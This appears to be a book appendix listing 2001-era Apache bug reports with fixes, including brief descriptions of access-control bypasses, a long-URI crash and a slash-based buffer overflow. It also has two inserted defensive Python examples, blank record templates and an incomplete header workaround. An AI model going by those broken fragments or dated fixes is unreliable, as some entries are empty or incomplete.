  Apache didn't have an answer (the support team doesn't address foreign
  modules) but the problem is pervasive enough that a HOWTO now exists
  that addresses at least part of this problem. Find it at
  http://www.faure.de/Apache+SSL+PHP+fp-howto-1p.html.

Number: 7248
URL: http://bugs.Apache.org/index.cgi/full/7248
Synopsis: Loading shared modules may fail due to unresolved references to
  libgcc.a.
Responsible: Apache
Arrival Date: Thu Feb 15 02:50:01 PST 2001
Closed Date:
Originator: strube@physik3.gwdg.de
Release: 1.3.17
Environment: Solaris 7, gcc 2.7.2.3
Description: When using gcc with this version, ensure that in
  src/Configuration, you define LD_SHLIB=gcc and LDFLAGS_SHLIB=-shared.

Number: 7251
URL: http://bugs.Apache.org/index.cgi/full/7251
Synopsis: Running into problems at approximately 232 virtual hosts
Responsible: Apache
Arrival Date: Thu Feb 15 10:10:03 PST 2001
Closed Date: Unspecified
Originator: miceli@buffalo.edu
Release: 1.3.14
Environment: SunOS 5.6, Sun's cc
Description: The originator ran into serious resource problems after adding
  more than 232 virtual hosts. The answer is at
  http://httpd.Apache.org/docs/misc/FAQ.html#fdlim.


Number: 7300
URL: http://bugs.Apache.org/index.cgi/full/7300
Synopsis: Win98 and Apache hang when Win98 goes Standby
Responsible: Apache
Arrival Date: Fri Feb 23 03:40:03 PST 2001
Closed Date: Wed May 30 11:13:34 PDT 2001
Originator: Apache@gustl.net
Release: 3.1.17
Environment: Win98, Win98SE
Description: When Win98 goes on standby, so does Apache. The quick workaround
  is to disable standby. However, the problem is really a bad interaction
  between PHP and Win98. The originator confirmed this after doing some
  research and finally disabling php4Apache.dll. The PHP folks are aware
  (the originator's version was PHP 4.04).

Number: 7323
URL: http://bugs.Apache.org/index.cgi/full/7323
Synopsis: Access control ineffective on IPv6/IPv4 mixed environment
Responsible: Apache
Arrival Date: Tue Feb 27 03:50:02 PST 2001
Closed Date: Thu Mar 22 02:05:55 PST 2001
Originator: kabe@sra-tohoku.co.jp
Release: httpd-2_0_12-alpha
Environment: SunOS 5.8, gcc version 2.95.2
Description: This bug has security implications and you should obtain the
  full bug report at the preceding URL. Apparently, differences in IPv4
  and IPv6 address structures can break certain Apache access controls.
  (The address capacity of IPv6 represents an expansion from the 32-bit
  capacity of IPv4 to 128 bits, a fourfold increase in length and an
  increase by 2 to the 96th power in address space.) In the response from
  Apache, there's a patch. Obtain it at this bug report's URL.
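The exact mechanism of report 7323 is in the bug database; as an added illustration (not the book's or Apache's code), the Python below shows one general way an IPv4/IPv6 address-structure mismatch defeats a network deny list, and a canonicalising check that closes the gap. The deny list and the client addresses are constructed, and the dual-stack (IPv4-mapped) scenario is an assumption made for the demonstration.

```python
"""IPv4/IPv6 mismatch in a network access control list, and a fix.

An IPv4 client that arrives through a dual-stack IPv6 socket is reported as
the IPv4-mapped address ::ffff:a.b.c.d.  A check that compares that literally
against IPv4 networks never matches, so "Deny from 10.0.0.0/8" silently
stops working for that client.
"""
import ipaddress

# Constructed deny list, in the spirit of Apache "Deny from" directives.
DENY_LIST = ["10.0.0.0/8", "192.0.2.0/24", "2001:db8:bad::/48"]


def _networks(deny_list):
    return [ipaddress.ip_network(net, strict=False) for net in deny_list]


def naive_is_denied(client, deny_list):
    """Literal comparison: an address only matches networks of its own
    version, so an IPv4-mapped IPv6 client slips past every IPv4 entry."""
    addr = ipaddress.ip_address(client)
    return any(addr in net for net in _networks(deny_list))


def canonical(addr):
    """Fold an IPv4-mapped IPv6 address back to the IPv4 address it carries."""
    if addr.version == 6 and addr.ipv4_mapped is not None:
        return addr.ipv4_mapped
    return addr


def hardened_is_denied(client, deny_list):
    """Canonicalise before comparing, so the same host is judged the same
    way whichever address family the socket reported it on."""
    addr = canonical(ipaddress.ip_address(client))
    return any(addr in net for net in _networks(deny_list))


if __name__ == "__main__":
    for client in ("10.1.2.3", "::ffff:10.1.2.3", "2001:db8:bad::1", "198.51.100.7"):
        print(f"{client:18} naive={naive_is_denied(client, DENY_LIST)!s:5} "
              f"hardened={hardened_is_denied(client, DENY_LIST)}")
```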


Number: 7362
URL: http://bugs.Apache.org/index.cgi/full/7362
Synopsis: Problem building 2.0a9 on Solaris
Responsible: Apache
Arrival Date: Tue Mar 06 07:20:01 PST 2001
Closed Date: Wed Mar 21 22:04:17 PST 2001
Originator: paul.hussein@chase.com
Release: 2.0a9
Environment: SunOS 5.6, gcc 2.7.2.3
Description: This issue arose from a bug that is now fixed in 2.0. The make
  would die at /dv1/sw/nt/Apache/2.0a9/Apache_2.0a9/srclib, and even
  after augmenting the code (an empty "ALL" in Makefile), the make died
  at /dv1/sw/nt/Apache/2.0a9/Apache_2.0a9/test. The solution is to
  upgrade to 2.0.

Number: 7365
URL: http://bugs.Apache.org/index.cgi/full/7365
Synopsis: Missing headers ap_cache.h and buff.h in proxy module
Responsible: Apache
Arrival Date: Tue Mar 06 12:50:01 PST 2001
Closed Date: Fri Jun 15 15:20:36 PDT 2001
Originator: info.jelmar@telia.com
Release: 2.0a9
Environment: WinNT4 Server with VC++7
Description: The originator was puzzled when he couldn't find the proxy
  header files ap_cache.h and buff.h in the proxy module. At the time,
  Apache responded that the proxy module was mangled and had been for
  some time. In a follow-up, Apache responded that the problem had since
  been fixed (and it works now). The solution is to upgrade.

Number: 7368
URL: http://bugs.Apache.org/index.cgi/full/7368
Synopsis: Trouble with dbm_fetch with Apache
Responsible: Apache
Arrival Date: Tue Mar 06 15:50:01 PST 2001
Closed Date: Unspecified


Originator: 


Release: 


Environment: 


Description: 


Number: 
URL: 
Synopsis: 
Responsible: 
Arrival Date: 
Closed Date: 
Originator: 


Release: 


Environment: 


Description: 


Number: 
URL: 
Synopsis: 
Responsible: 
Arrival Date: 


Closed Date: 
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patou@sympatico.ca 
Apache_1.3.14 
Red Hat 7.0 kernel 2.2.16-22 i586 


The originator found that when he started Apache (Apachect1 
startssl), Apache would fault and report the following error: Cannot 
load /etc/httpd/modules/mod_rewrite.so: undefined symbol: 
dbm_fetch. The originator then commented out (and therefore didn’t 
load) the rewrite module and received instead a dbm_fetch error for 
mod_auth_dbm. This is substantially the same issue Adam Goodman 
raised in Problem Report 4706 in July 1999. My research suggests that 
this is related to gdbm. If you encounter this problem, try ascertaining 
the libraries that the offending application is linked to—try using nm, for 
example. You may find that the required libraries aren't on your drive 
(or rather, aren’t accessible in the same place they were in the offending 


application’s original build environment). 


Number: 7377
URL: http://bugs.Apache.org/index.cgi/full/7377
Synopsis: Can't make it
Responsible: Apache
Arrival Date: Thu Mar 08 13:10:00 PST 2001
Closed Date: Wed Mar 21 21:51:07 PST 2001
Originator: Rainer@Dubaschny.de
Release: 1.3.19
Environment: Linux SuSE 7.1
Description: The originator's make failed at mod_rewrite.c:93:
mod_rewrite.h:135: db1/ndbm.h: file not found. Apache patched the problem; if
you encounter this, upgrade.


Number: 7387
URL: http://bugs.Apache.org/index.cgi/full/7387
Synopsis: winsock.h is included in service.c
Responsible: Apache
Arrival Date: Sun Mar 11 13:50:00 PST 2001
Closed Date: Wed Mar 21 22:10:29 PST 2001
Originator: info.jelmar@telia.com
Release: 2.0.14
Environment: WinNT4 sp6 with VC++7
Description: This problem is attributable to Microsoft. windows.h includes
winsock.h before it's possible to include winsock2.h—an irritating problem that
causes a fatal make error. As Apache responded, "Microsoft made it near
impossible to sequence these right." Although Apache has since fixed this
problem, the quick workaround looked like this:

#ifndef WIN32_LEAN_AND_MEAN
#define WIN32_LEAN_AND_MEAN   /* keeps windows.h from pulling in winsock.h */
#endif

#ifdef __cplusplus
extern "C" {
#endif

/* the header includes themselves are not shown in the report as printed */

#ifdef __cplusplus
}
#endif


Number: 7392
URL: http://bugs.Apache.org/index.cgi/full/7392
Synopsis: Ctrl+Refresh in Internet Explorer 5.5 causes server to crash
Responsible: Apache
Arrival Date: Mon Mar 12 04:50:03 PST 2001
Closed Date: Mon Sep 03 11:59:49 PDT 2001
Originator: Mike@Piff.org.uk
Release: 1.3.19
Environment: Windows 2000
Description: An interesting little ditty, but not Apache-borne. Reportedly,
the originator (and others) found that pressing Ctrl+Refresh (or even simply
Refresh) in IE 5.5 kills the server. This is purportedly tied to a flawed Java
implementation on the client side. This isn't Apache's responsibility, but it's
interesting nonetheless—and it works. Administrators running Apache on Win2000
might consider having their locked screensaver kick in after 1 minute.
Otherwise, bozos walking by can down your server with a keystroke.


Number: 7404
URL: http://bugs.Apache.org/index.cgi/full/7404
Synopsis: Core dump (Hostname lookup)
Responsible: Apache
Arrival Date: Tue Mar 13 20:10:00 PST 2001
Closed Date: Tue Mar 13 20:46:10 PST 2001
Originator: tanaka@Apache.or.jp
Release: 1.3.19
Environment: FreeBSD
Description: This was a core dump on host lookup, a legitimate problem, and one
for which a patch exists. Grab the fix at this bug report's URL (if you haven't
already upgraded).


Number: 7407
URL: http://bugs.Apache.org/index.cgi/full/7407
Synopsis: [PATCH] access control ineffective on IPv6/IPv4 mixed environment
(port of PR#7323 for 2.0.14-alpha)
Responsible: Apache
Arrival Date: Tue Mar 13 23:20:00 PST 2001
Closed Date: Thu Mar 22 02:09:55 PST 2001
Originator: kabe@sra-tohoku.co.jp
Release: 2.0.14-alpha
Environment: SunOS 5.8, gcc 2.95.2
Description: This was an ongoing problem (please see 7323). However, in this
report, the participants included a quick workaround too lengthy to print here.
The fix is labeled IPv6-mod_access.patch. If you have these problems (and
they're bound to crop up more often now), get the patch at this bug report's
URL.


Number: 7414
URL: http://bugs.Apache.org/index.cgi/full/7414
Synopsis: Web servers will not load modules.
Responsible: Apache
Arrival Date: Wed Mar 14 20:20:00 PST 2001
Closed Date: Unspecified
Originator: pbruce@kpmg.com
Release: 1.3.19
Environment: Solaris 2.8, gcc version 2.95.2
Description: I'm a big beer fan, as you might know from my online interviews in
Germany, Brazil, and elsewhere. (I drink Edelweiss, a 500-year-old brew from
Austria.) The originator related in his discussion the following information:
"So whoever helps me. I guarantee one way or the other A BIG COOL GLASS of
BEER is on the house with ME." Well, Mr. Bruce, you're on. Apache didn't finish
its load because your mod_access config was mangled. First, note the line
#LoadModule access_module libexec/mod_access. It seems as if that might be
missing something. Generally, the problem arises when a) you did this at build
time: '--disable-module=access'; b) you fail to add both the AddModule
mod_access.c and LoadModule access_module statements; or c) you fail to
articulate the module's full name (mod_access, for example). Try mod_access.so
and when you're done, have that beer. Edelweiss, it's called; you'll find it at
any store that sells exotic beers from Europe. Try the Dunkel—it's sweet,
creamy, and evidence that 500 years of brewing experience amounts to
something. Cheers.


Number: 7429
URL: http://bugs.Apache.org/index.cgi/full/7429
Synopsis: Rapid memory leaks leading to kernel panic
Responsible: Apache
Arrival Date: Sat Mar 17 15:20:01 PST 2001
Closed Date: Unspecified
Originator: dgatwood@mklinux.org
Release: 1.3.14
Environment: Linux (MkLinux DR3) and egcs-2.90.25
Description: The originator found a massive memory leak where Apache would eat
200+ megabytes over a five-hour period. He therefore wrote a cron script to
kill and restart Apache every so often. Notably, his config was spartan and did
not include exotic modules or heavily customized directives. Nothing in his
report could account for this behavior (and Mr. Gatwood is a notable,
experienced Linux user on the PowerPC platform, not a newbie). Regrettably, I
could find no collateral research that suggested an answer or even a plausible
cause. Perhaps an upgrade will help.


Number: 7453
URL: http://bugs.Apache.org/index.cgi/full/7453
Synopsis: HTTPD (1.3.19) server dumps if system is not connected at network
(TokenRing/Ethernet)
Responsible: Apache
Arrival Date: Fri Mar 23 08:30:01 PST 2001
Closed Date: Fri Mar 23 11:05:32 PST 2001
Originator: servissoglou@de.ibm.com
Release: 1.3.19
Environment: Red Hat 6.2, egcs-2.91.66
Description: The originator found that when the system wasn't connected to the
network, HTTPD died and dumped at ap_get_local_host in src/main/util.c. Apache
has since patched this problem and the patch is at
http://cvs.Apache.org/viewcvs.cgi/Apache-1.3/src/main/util.c.diff?r1=1.194&r2=1.195.


Number: 7455
URL: http://bugs.Apache.org/index.cgi/full/7455
Synopsis: Apache overrides rewrite engine directives, automatically returns a
PHP file even if only its name matches (not its extension)
Responsible: Apache
Arrival Date: Fri Mar 23 23:20:00 PST 2001
Closed Date: Wed Mar 28 15:54:15 PST 2001
Originator: aycan@wowwebdesigns.com
Release: 1.3.19
Environment: Linux 2.2.16 (Slackware 7.1)
Description: The originator found that if Apache couldn't find an exact file
match, it would return a similarly named file, even if the extension weren't
correct. The solution is to remove Options -MultiViews from the offending or
affected directory.
Number: 7460
URL: http://bugs.Apache.org/index.cgi/full/7460
Synopsis: Segmentation fault on starting
Responsible: Apache
Arrival Date: Mon Mar 26 00:30:00 PST 2001
Closed Date: Mon Mar 26 04:08:17 PST 2001
Originator: kamio@vuni.ne.jp
Release: 1.3.19
Environment: Linux i486 gcc Red Hat 6.0
Description: The originator found that Apache would seg fault on startup with
signal 11. He ran a back trace indicating a problem with how Apache handled the
hostname (or reporting that it couldn't). The patch (if you haven't upgraded)
is at
http://cvs.Apache.org/viewcvs.cgi/Apache-1.3/src/main/util.c.diff?r1=1.194&r2=1.195.


Number: 7489
URL: http://bugs.Apache.org/index.cgi/full/7489
Synopsis: Compile error
Responsible: Apache
Arrival Date: Fri Mar 30 13:10:00 PST 2001
Closed Date: Sat Mar 31 04:25:59 PST 2001
Originator: dcavanaugh@ucsd.edu
Release: 2.0.15a
Environment: Win2k, 2.0.15a, VC97, Perl, v5.6.0
Description: This problem has been fixed and is related to Windows SDK security
descriptors. TRUSTEE_IS_WELL_KNOWN_GROUP must be defined. See the full bug
report for the patch.


Number: 7497
URL: http://bugs.Apache.org/index.cgi/full/7497
Synopsis: DoS caused by error—Too many open files: Error accepting on cgid
socket
Responsible: Apache
Arrival Date: Sat Mar 31 21:50:00 PST 2001
Closed Date: Sun Apr 01 00:15:49 PST 2001
Originator: d.begley@uws.edu.au
Release: 2.0.15
Environment: Solaris 7, gcc 2.8.1
Description: After 16 requests (CGI), Apache loops into an error reporting
state and rapidly fills the disk (via error_log). This was a file descriptor
leak and has since been fixed. Upgrade.


Number: 7500
URL: http://bugs.Apache.org/index.cgi/full/7500
Synopsis: Potential CGI variable exploit from header canonicalization
Responsible: Apache
Arrival Date: Sun Apr 01 13:20:00 PDT 2001
Closed Date: Unspecified
Originator: kabe@sra-tohoku.co.jp
Release: 2.0.15
Environment: SunOS 5.8, gcc 2.95.2
Description: The originator reported that when a request header name contains
characters outside [a-zA-Z_], Apache (and perhaps other servers) converts those
characters to _ while building the CGI environment variable name, so two
different header names can end up in the same variable. This could produce
unexpected results and allow crackers to bypass access controls. The full bug
report includes a patch.
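As an added example (not code from the bug report or from Apache), the following Python reimplements the canonicalization rule the report describes, detects header names that alias one another, and shows a stricter builder that refuses them; the regexes, function names and sample headers are assumptions.

```python
import re
from collections import defaultdict

# Assumed canonicalization (a hypothetical reimplementation, not Apache's code):
# the report says characters outside [a-zA-Z_] become '_'; digits are kept here
# as an assumption, since header names such as X-Forwarded-For2 occur in practice.
_NON_CANONICAL = re.compile(r"[^A-Za-z0-9_]")


def cgi_meta_variable(header_name):
    """Map a request-header name to its CGI meta-variable name (HTTP_<NAME>)."""
    return "HTTP_" + _NON_CANONICAL.sub("_", header_name).upper()


def build_cgi_environment(headers):
    """Naive builder: a later header silently overwrites an earlier one that
    canonicalizes to the same variable, which is the behaviour the report
    warns about."""
    env = {}
    for name, value in headers:
        env[cgi_meta_variable(name)] = value
    return env


def find_header_collisions(headers):
    """Detection: {meta_variable: [distinct header names]} for every variable
    that more than one distinct header name maps to."""
    groups = defaultdict(list)
    for name, _ in headers:
        var = cgi_meta_variable(name)
        if name not in groups[var]:
            groups[var].append(name)
    return {var: names for var, names in groups.items() if len(names) > 1}


# Mitigation rule (assumed): accept only letters, digits and '-' in header
# names. Under that rule canonicalization is one-to-one (case aside, and HTTP
# header names are case-insensitive anyway), so a look-alike name can no
# longer shadow a header that a front end set after authenticating the user.
_STRICT_TOKEN = re.compile(r"^[A-Za-z0-9-]+$")


def build_strict_cgi_environment(headers):
    """Hardened builder: drop any header whose name could alias another."""
    env = {}
    for name, value in headers:
        if not _STRICT_TOKEN.match(name):
            continue  # dropped rather than canonicalized
        env[cgi_meta_variable(name)] = value
    return env


# Constructed sample headers (not from the report): X-Auth-User is what a
# front-end proxy set; the two look-alikes arrived from the client.
SAMPLE_HEADERS = [
    ("Host", "www.example.test"),
    ("X-Auth-User", "alice"),
    ("X_Auth_User", "admin"),
    ("X.Auth.User", "root"),
    ("Accept", "text/html"),
]

if __name__ == "__main__":
    print(find_header_collisions(SAMPLE_HEADERS))
    print(build_cgi_environment(SAMPLE_HEADERS)["HTTP_X_AUTH_USER"])
    print(build_strict_cgi_environment(SAMPLE_HEADERS)["HTTP_X_AUTH_USER"])
```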


Number: 7522
URL: http://bugs.Apache.org/index.cgi/full/7522
Synopsis: Apache Win32 8,192 string bug
Responsible: Apache
Arrival Date: Thu Apr 05 02:10:01 PDT 2001
Closed Date: Wed May 30 08:00:41 PDT 2001
Originator: kaino3@genie.it
Release: All prior to 1.3.20
Environment: Windows 9x/NT/2000
Description: A string of 8,192 chars, sent in a certain way, as a long URI, can
disable Apache. The problem has since been patched. For more details, see the
full report.
Number: 7524
URL: http://bugs.Apache.org/index.cgi/full/7524
Synopsis: Doc-Root on Novell Server doesn't work
Responsible: Apache
Arrival Date: Thu Apr 05 07:30:00 PDT 2001
Closed Date: Sun Apr 15 11:15:13 PDT 2001
Originator: mamier@profidata.de
Release: 1.3.12-1.3.19
Environment: WIN 2000 SP1, Microsoft Client for NetWare
Description: Mapped drives will not let Apache use DocRoot unless you first
alter the permissions. Modify the permissions to give the default system user
ID access and it will work.


Number: 7568
URL: http://bugs.Apache.org/index.cgi/full/7568
Synopsis: Computer restarts after site is hit
Responsible: Apache
Arrival Date: Sun Apr 15 20:20:00 PDT 2001
Closed Date: Wed May 30 10:58:45 PDT 2001
Originator: dannonz@hotmail.com
Release: 1.3.19
Environment: Windows 2000, PHP4
Description: The originator found an inexplicable problem: When outside users
(those not on his internal LAN) pulled any Web document on his virtual servers
(even a directory listing), his machine rebooted. Apache opined that this might
be related to PHP. I could find no collateral research that even remotely
suggested a similar problem, nor a fix.


Number: 7595
URL: http://bugs.Apache.org/index.cgi/full/7595
Synopsis: "Sorry, but we cannot grok hp9000_803-hpux10.20"
Responsible: Apache
Arrival Date: Fri Apr 20 16:00:01 PDT 2001
Originator: wbelvin@blackboard.com
Release: 1.3.9
Environment: Unspecified
Description: The originator couldn't get a decent make because Apache didn't
recognize the platform (in this case, HP-UX). Apache developed a more aware
GuessOS (originally by Jim Jagielski), which is now at
http://cvs.Apache.org/viewcvs.cgi/~checkout~/Apache-1.3/src/helpers/GuessOS?rev=1.74.


Number: 7633
URL: http://bugs.Apache.org/index.cgi/full/7633
Synopsis: httpd executes then exits with no error
Responsible: Apache
Arrival Date: Thu Apr 26 08:50:01 PDT 2001
Closed Date: Unspecified
Originator: andrew@stratus.net
Release: 1.3.19 and 1.3.17
Environment: Linux, gcc version 2.95.3
Description: The originator reported that when he started Apache, it would die
and offer (in error_log) the following error: [info] created shared memory
segment #xxxx. Apache had no answer at the time. However, collateral research
suggests that this is related to JServ or servlet use and/or mod_perl. I
suggest trying a new compile without either.


546 APPENDIX B Apache Security Advisories and Bugs

Number: 7761
URL: http://bugs.Apache.org/index.cgi/full/7761
Synopsis: Wrong handling of illegal proxy request when proxying is disabled
Responsible: Apache
Arrival Date: Mon May 21 17:00:01 PDT 2001
Closed Date: Unspecified
Originator: ast@domdv.de
Release: 1.3.20
Environment: Linux 2.2.19, gcc 2.95.3
Description: The originator reported that outside users attempting to use his
servers as public proxies received 404 errors. He felt that this could degrade
service and wondered whether this behavior was correct. The official response:
"In short: if proxy requests are not allowed 403 is the proper response to such
a request."


Number: 7772
URL: http://bugs.Apache.org/index.cgi/full/7772
Synopsis: Can't make it
Responsible: Apache
Arrival Date: Wed May 23 05:30:01 PDT 2001
Closed Date: Unspecified
Originator: mpak@ess-web.com
Release: 1.3.20
Environment: Unspecified
Description: See 7377.


Number: 7790
URL: http://bugs.Apache.org/index.cgi/full/7790
Synopsis: SERVICE_CONFIG_DESCRIPTION: undeclared identifier
Responsible: Apache
Arrival Date: Wed May 30 03:20:02 PDT 2001
Closed Date: Mon Sep 24 15:05:01 PDT 2001
Originator: Tobias.Trelle@CyCoSys.com
Release: 1.3.20
Environment: Unspecified
Description: This is now fixed. Upgrade.


Number: 7805
URL: http://bugs.Apache.org/index.cgi/full/7805
Synopsis: Apache cannot be installed on W2k server with the MSI installer
package
Responsible: Apache
Arrival Date: Sat Jun 02 07:40:00 PDT 2001
Closed Date: Thu Aug 30 10:14:58 PDT 2001
Originator: alain@valain.com
Release: 1.3.20
Environment: Unspecified
Description: The originator had serious problems—as many have had—with the
Windows MSI installer. Check
http://www.Apache.org/dist/httpd/binaries/win32/TROUBLESHOOTING.html for
solutions.


Number: 7867
URL: http://bugs.Apache.org/index.cgi/full/7867
Synopsis: htpasswd crypt() encryption broken
Responsible: Apache
Arrival Date: Wed Jun 13 17:10:01 PDT 2001
Closed Date: Wed Jun 13 18:27:37 PDT 2001
Originator: triumph@gankish.net
Release: 1.3.19
Environment: Slackware
Description: The originator found that htpasswd would seg fault when using the
default crypt function. Slackware's crypt function (at the time) was
incompatible with many others and was apparently at least marginally broken.
The suggested workaround was to install the descrypt package.


Number: 7905
URL: http://bugs.Apache.org/index.cgi/full/7905
Synopsis: http://localhost/ AND http://192.0.0.123/ cannot be accessed at
local PC and remote PC
Responsible: Apache
Arrival Date: Fri Jun 22 01:50:00 PDT 2001
Closed Date: Fri Jun 22 22:31:53 PDT 2001
Originator: laychengtan@unitest.com.sg
Release: 1.3.19
Environment: Windows 98
Description: See 7173.
Number: 7944
URL: http://bugs.Apache.org/index.cgi/full/7944
Synopsis: Security hole for Directory restrictions for Cygwin 1.x
Responsible: Apache
Arrival Date: Wed Jun 27 02:40:01 PDT 2001
Closed Date: Unspecified
Originator: tolj@wapme-systems.de
Release: 1.3.20
Environment: CYGWIN_NT-4.0 WAPME-244
Description: The originator found that attackers could circumvent directory
security by using Windows canonical (8.3) filenames. This has since been
patched.


Number: 7947
URL: http://bugs.Apache.org/index.cgi/full/7947
Synopsis: Apache::LogFile with TransferLog and rotatelogs problems
Responsible: Apache
Arrival Date: Wed Jun 27 13:20:02 PDT 2001
Originator: benelb@nac.net
Release: 1.3.20 with Mod_Perl 1.25
Environment: SunOS, Mod_Perl 1.25, Perl 5.6.1
Description: The originator reported that Apache (using Apache::LogFile) was
dumping access_log and error_log output into the same file. The solution was
to properly define separate entries for each log, thus differentiating them.


Number: 7976
URL: http://bugs.Apache.org/index.cgi/full/7976
Synopsis: Build error with module php and ldap
Responsible: Apache
Arrival Date: Wed Jul 04 04:20:02 PDT 2001
Closed Date: Unspecified
Originator: brethes@imerir.com
Release: 1.3.20
Environment: Solaris 2.8, PHP 4.0.6, gcc
Description: The originator tried to compile with php and ldap and the build
died at ld: fatal: Symbol referencing errors. No output written to httpd.
Collateral research indicates that you should ensure that bison and flex are
installed and then try ./configure --prefix=/opt/Apache --enable-module=so;
make; make install and then ./configure --with-apxs=/opt/Apache/bin/apxs;
make; make install. Beyond this, you might need to edit your httpd.conf to
catch php4 (and restart). That should do the trick.


Number: 7981
URL: http://bugs.Apache.org/index.cgi/full/7981
Synopsis: After executing the command ./Apachectl start, httpd fails to
initialize
Responsible: Apache
Arrival Date: Thu Jul 05 00:20:00 PDT 2001
Closed Date: Unspecified
Originator: bobsonl@is3c.com
Release: Apache_1.3.9 for hpux10.20
Environment: hpux10.20, gcc
Description: After trying to start Apache, the originator encountered this
error: /usr/lib/dld.sl: call to mmap() failed. This occurs because one or more
involved libraries have no permissions to perform the desired operation. The
originator must explicitly provide permissions and Apache will start without
event.


Number: 7998
URL: http://bugs.Apache.org/index.cgi/full/7998
Synopsis: values-Xa.o: No such file or directory
Responsible: Apache
Arrival Date: Mon Jul 09 02:20:00 PDT 2001
Closed Date: Unspecified
Originator: rrajaseh@erggroup.com
Release: 1.3.20
Environment: Solaris 5.7, GCC ver 2.95
Description: When the originator tried to compile, he received this error:
values-Xa.o: No such file or directory. The answer is at
http://www.sunfreeware.com/faq.html#q5.


Number: 8109
URL: http://bugs.Apache.org/index.cgi/full/8109
Synopsis: Internal error
Responsible: Apache
Arrival Date: Mon Jul 30 12:30:00 PDT 2001
Closed Date: Unspecified
Originator: rpina@ctc.cl
Release: 1.3.20-win32
Environment: WinNT 4.0
Description: The originator tried to install but his install failed on Windows
internal error #2103. The answer is at
http://support.microsoft.com/default.aspx?scid=kb;EN-US;q302472.


Number: 8143
URL: http://bugs.Apache.org/index.cgi/full/8143
Synopsis: When error log reaches Linux's maximum file size of 2gig, Apache
will crash.
Responsible: Apache
Arrival Date: Sun Aug 05 15:20:00 PDT 2001
Closed Date: Unspecified
Originator: webmaster@grappone.com
Release: 1.3.19
Environment: Linux
Description: The originator wrote: "When Apache's error log hits 2 gigs, it
will crash when it tries to write to it. And since it can't write to the error
log, there's no way to find out why it crashed." True enough, which is why you
should routinely rotate your logs.


Number: 8286
URL: http://bugs.Apache.org/index.cgi/full/8286
Synopsis: Segmentation fault and core dump when using mod_rewrite and mod_so
Responsible: Apache
Arrival Date: Mon Sep 03 07:30:00 PDT 2001
Closed Date: Unspecified
Originator: abottoni@quadrante.com
Release: 1.3.20
Environment: Linux
Description: ezPublish problem. Check 4577, 6204, and 8205.


Number: 8301
URL: http://bugs.Apache.org/index.cgi/full/8301
Synopsis: Cannot start Apache
Responsible: Apache
Arrival Date: Wed Sep 05 14:20:00 PDT 2001
Closed Date: Unspecified
Originator: c-nitin.rahalkar@wcom.com
Release: Apache_1.3.20
Environment: Slackware, gcc
Description: The originator performed a make and received this message on
startup: libc.so.6: version 'GLIBC_2.2' not found. This is not good news,
because tampering with glibc is a complicated matter. Altering or upgrading
your libraries can break many things, including vital system components. I
recommend trying a newer Linux version on a separate box with the latest
Apache as a test bed.


Number: 8381
URL: http://bugs.Apache.org/index.cgi/full/8381
Synopsis: Startup failure from vanilla installation
Responsible: Apache
Arrival Date: Fri Sep 21 05:10:00 PDT 2001
Closed Date: Fri Sep 21 10:30:45 PDT 2001
Originator: rwilhm@yahoo.com
Release: Apache 1.3.20 - Win32 Binary Distribution
Environment: Windows 2000, Service Pack 2
Description: The originator found that after a clean install, startup failed,
with this error: WSADuplicateSocket failed for socket 368. The answer is at
http://httpd.Apache.org/docs/misc/FAQ.html#WSADuplicateSocket.


Number: 8431
URL: http://bugs.Apache.org/index.cgi/full/8431
Synopsis: 200 slashes (/) will cause a buffer overflow and give a directory
listing under Apache win32
Responsible: Apache
Arrival Date: Sat Sep 29 14:40:00 PDT 2001
Closed Date: Mon Oct 01 15:05:17 PDT 2001
Originator: usa2600@yahoo.com
Release: 1.3 win32
Environment: Windows 98 Apache 1.3
Description: Fixed in 1.3.21, this bug produces a buffer overflow. If you're
using an earlier version on Win98, upgrade immediately.


Number: 8451
URL: http://bugs.Apache.org/index.cgi/full/8451
Synopsis: Linker error: /usr/local/include/sys/sem.h:52: field 'sem_perm' has
incomplete type
Responsible: Apache
Arrival Date: Tue Oct 02 10:50:00 PDT 2001
Closed Date: Wed Nov 14 23:19:15 PST 2001
Originator: jari.aalto@poboxes.com
Release: 2.0.16
Environment: Win2000 and Cygwin
Description: The originator tried a build and received massive errors because
Cygwin wasn't supported in that release. The official response is to upgrade
to 2.0.28.


Number: 8568
URL: http://bugs.Apache.org/index.cgi/full/8568
Synopsis: Web crawlers are able to gain access to directory listings of
forbidden directories
Responsible: Apache
Arrival Date: Wed Oct 17 13:10:00 PDT 2001
Closed Date: Unspecified
Originator: blackdeath@softhome.net
Release: 1.3.20
Environment: Linux, gcc
Description: The originator discovered that Web crawlers can access documents
and directories on his servers—even in protected directories and those that
existed for only a day (or even less time). This is distressing. Apache hasn't
provided an answer (nor am I sure that they can), but perhaps it's related to
the Wayback Machine project (http://www.archive.org/index.html).


Number: 8574
URL: http://bugs.Apache.org/index.cgi/full/8574
Synopsis: Apache listener hangs/exits with child processes still running
Responsible: Apache
Arrival Date: Thu Oct 18 05:40:00 PDT 2001
Originator: sradovan@montage.ca
Release: 1.3.12
Environment: SunOS 5.7, gcc
Description: The originator received the following error: child pid 11463 exit
signal Bus Error (10). Apparently, his LockFile config was erroneous; Apache
couldn't make one, and thus bailed out.


Number: 8618
URL: http://bugs.Apache.org/index.cgi/full/8618
Synopsis: Failed to get a socket for port 80
Responsible: Apache
Arrival Date: Thu Oct 25 10:30:01 PDT 2001
Closed Date: Unspecified
Originator: jeiderm@yahoo.com.br
Release: 1.3.20-win32-src-r2
Environment: Windows 95
Description: On startup, the originator received the following error: [crit]
make_sock: failed to get a socket for port 80. Generally, this can be solved by
properly defining your ServerName directive.


Number: 8814
URL: http://bugs.Apache.org/index.cgi/full/8814
Synopsis: (32538) Socket operation on non-socket: Parent: WSADuplicateSocket
failed for socket 6640424
Priority: medium
Responsible: Apache
Arrival Date: Tue Nov 20 11:20:00 PST 2001
Closed Date: Unspecified
Originator: some3dlamer@yahoo.com
Release: 2.0.28 beta win32
Environment: Win98SE
Description: See 8381.


C

Apache Security Resources

The following links provide a wide range of tools, advisories, documents, and
other resources that will help you secure your Apache host and keep it that
way.


Site Title: Apache Week's Security Resource
URL: http://www.apacheweek.com/security/
Description: This site documents security vulnerabilities in Apache as they
emerge.

Site Title: The WWW Security FAQ
URL: http://www.w3.org/Security/Faq/
Description: This document is Lincoln Stein's frequently asked questions list
on WWW security. First released nearly six years ago, this document remains a
must-have for all Web administrators. The current version is Version 3.1.2,
released on February 4, 2002.

Site Title: Apache SSL
URL: http://www.apache-ssl.org/
Description: Apache-SSL is a secure Web server, based on Apache and
SSLeay/OpenSSL (see OpenSSL at http://www.openssl.org). Apache-SSL is licensed
under a BSD-style license and you are free to use it for commercial or
non-commercial purposes, so long as you retain the copyright notices. This is
